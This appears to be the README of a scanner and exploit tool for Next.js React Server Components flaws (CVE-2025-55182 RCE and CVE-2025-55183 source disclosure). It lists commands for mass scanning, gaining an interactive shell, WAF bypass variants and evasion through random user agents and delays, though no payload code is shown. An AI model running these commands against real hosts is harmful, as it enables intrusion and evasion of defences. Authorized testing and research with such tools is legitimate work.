This repository contains a scanner tool for CVE-2025-55182 (RCE) and CVE-2025-55183 (Source Code Disclosure) in Next.js React Server Components (RSC).
This tool is for educational and authorized testing purposes only. Do not use this tool on systems you do not own or have explicit permission to test. The authors are not responsible for any misuse.
- Sorry for the delay, another vulnerability was encountered for analysis, thanks for reporting your issue.
- I'm currently searching for vulnerabilities disclosed by Vercel on HackerOne. If anyone is interested in joining, you can open an issue or check out VERCEL_RESEARCH.md for ongoing research and collaboration
For a detailed technical analysis, please refer to: https://react2shell.com/
- Python 3.x: Required to run the scanner.
- Dependencies: Install via pip:
pip3 install -r requirements.txt
Check if a target URL is vulnerable.
python3 CVE-2025-55182.py -u <url>Scan a list of hosts from a file (one per line).
python3 CVE-2025-55182.py -l <hosts_file>Gain an interactive shell on a vulnerable target.
python3 CVE-2025-55182.py -u <url> --exploitCheck if a target leaks source code via Server Actions.
python3 CVE-2025-55182.py -u <url> --nextjs-rsc-source-code-disclosureUse side-channel detection (timing/error based) instead of attempting RCE.
python3 CVE-2025-55182.py -u <url> --safe-checkAdd junk data to bypass WAF content inspection or use specific bypasses.
# Standard WAF bypass (junk data)
python3 CVE-2025-55182.py -u <url> --waf-bypass --waf-bypass-size 128
# Vercel WAF bypass variant
python3 CVE-2025-55182.py -u <url> --vercel-waf-bypass# Custom headers
python3 CVE-2025-55182.py -u <url> -H "Authorization: Bearer token" -H "X-Custom: Header"
# Proxy usage
python3 CVE-2025-55182.py -u <url> --proxy http://127.0.0.1:8080# Random User-Agent and Delay
python3 CVE-2025-55182.py -u <url> --random-agent --delay 2.0
# Scan specific path
python3 CVE-2025-55182.py -u <url> --path /_next --path /apiSave results to a file in JSON, CSV, or HTML format. The --all-results flag saves both vulnerable and non-vulnerable hosts.
python3 CVE-2025-55182.py -u <url> -o results.json --format json --all-results| Argument | Description |
|---|---|
-u, --url |
Single URL/host to check. |
-l, --list |
File containing list of hosts to scan. |
--exploit |
Enter interactive shell mode (requires -u). |
--nextjs-rsc-source-code-disclosure |
Check for Source Code Disclosure (CVE-2025-55183). |
-t, --threads |
Number of concurrent threads (default: 10). |
--timeout |
Request timeout in seconds (default: 10). |
-o, --output |
Output file for results. |
--format |
Output format: json, csv, html. |
--all-results |
Save all results, not just vulnerable ones. |
-k, --insecure |
Disable SSL certificate verification. |
-H, --header |
Custom header in 'Key: Value' format. |
--path |
Custom path to test (e.g., '/_next'). |
--path-file |
File containing list of paths to test. |
--safe-check |
Use safe side-channel detection instead of RCE PoC. |
--windows |
Use Windows PowerShell payload. |
--waf-bypass |
Add junk data to bypass WAF. |
--waf-bypass-size |
Size of junk data in KB for WAF bypass. |
--vercel-waf-bypass |
Use Vercel WAF bypass payload. |
--bypass-variant |
Select specific WAF bypass variant (1-102) or 'all'. |
-x, --proxy |
Proxy URL (e.g., http://127.0.0.1:8080). |
--random-agent |
Use random User-Agent for each request. |
--delay |
Delay between requests in seconds. |
-v, --verbose |
Verbose output (show response snippets). |
-q, --quiet |
Quiet mode (only show vulnerable hosts). |
--no-color |
Disable colored output. |
You can run a vulnerable instance for testing using the provided Docker image:
docker build -t cve-local .
docker run --rm -p 3000:3000 cve-localInterested in Vercel security research? Check out our collaborative research document:
📄 VERCEL_RESEARCH.md - A comprehensive guide for:
- Analyzing Vercel vulnerabilities disclosed on HackerOne
- Understanding WAF bypass techniques
- Contributing findings and research
- Collaborating with the security community
Open an issue with the research label to join the discussion!